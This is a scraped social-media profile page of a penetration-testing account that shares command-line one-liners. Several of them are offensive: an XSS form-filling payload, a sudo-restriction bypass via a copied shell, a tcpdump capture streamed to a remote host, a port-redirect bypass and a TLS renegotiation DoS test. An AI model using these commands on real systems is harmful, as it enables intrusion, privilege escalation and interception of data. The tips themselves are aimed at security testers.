Pentest CLI Fu
@pentestcli
Command-Line Fu for Penetration Testers. One-liners that might save you some time breaking people's stuff. Suggestions to @pentestcli or @marcwickenden
You might like
console> for (i=0;i<document.forms[0].elements.length;i++) { document.forms[0].elements[i].value='<script>alert('+i+')</script>'; } #testxss
Hacky quick and dirty HTTPS server: python -m SimpleHTTPServer & ncat --ssl -l 8443 --sh-exec "ncat 127.0.0.1 8000" --keep-open
Increment over string to generate fuzz list in #ruby: str = 'somestring'; a = ''; str.each_char {|b| a << b; puts a }
Avoiding sudo regex interactive restrictions: cp /bin/sh /tmp/foo; sudo /tmp/foo
@pentestcli nc -lvp 9999 | tcpdump -XX -vvv -r - # Pass traffic FROM a raw tcp socket back into tcpdump for rendering/parsing
@pentestcli tcpdump -w - | nc -v 8.8.8.8 9999 # sniff traffic with tcpdump and write raw capture data to a remote tcp socket
@pentestcli wget example.com/file.txt -O - # Use wget to write to stdout instead of a file if CURL isn't available
@pentestcli grep -E -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' # Basic regex for pulling IP addresses from a file or stdout
@zyx2k @pentestcli ps aux | grep [p]rocessname | sed s/’whoami’[^0-9]*// | cut -d “ “ -f 1 :)
Use irb to update a host in #msfconsole: `framework.db.report_host(:host=>"X.X.X.X",:info=>"Cool")` cc: @pentestcli @metasploit
RT @hdmoore GNU sort can order input by IPv4 address using -V or --version-sort < This is awesome! CC @climagic @pentestcli
“@bonsaiviking: @pentestcli #Perl perl -e 'printf "%.8i\n", $_ for (0..99999999)'” < in perl too :-)
#ruby to print out all 8 digit numbers: ruby -e '(00000000..99999999).each {|x| puts "%.8i" % x}'
Make XML human-readable: xmllint --format --encode utf-8 document.xml
Awesome reference for #ruby one-liners reference.jumpingmonkey.org/programming_la…
@pentestcli ssh [email protected] "cat file.tar.gz" > file.tar.gz # transfer files through ssh when sftp is disabled
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 4444 # internal port redirect to bypass services (cc. @pentestcli)
Quick test for SSL/TLS Renegotiation DoS - openssl s_client -connect ip:port | echo -e "HEAD / HTTP/1.0\r\nR" @pentestcli
United States Trends
- 1. Chiefs 74K posts
- 2. #TNABoundForGlory 35.3K posts
- 3. LaPorta 9,235 posts
- 4. Goff 11.6K posts
- 5. Kelce 12.7K posts
- 6. #OnePride 5,470 posts
- 7. Butker 7,539 posts
- 8. Bryce Miller 2,609 posts
- 9. #DETvsKC 3,795 posts
- 10. Baker 50K posts
- 11. #ALCS 8,532 posts
- 12. #SNFonNBC N/A
- 13. Collinsworth 2,103 posts
- 14. Gibbs 5,216 posts
- 15. Dan Campbell 2,095 posts
- 16. Pacheco 4,530 posts
- 17. Polanco 6,361 posts
- 18. Patrick Mahomes 6,619 posts
- 19. Leon Slater 2,623 posts
- 20. Kareem Hunt N/A
You might like
Something went wrong.
Something went wrong.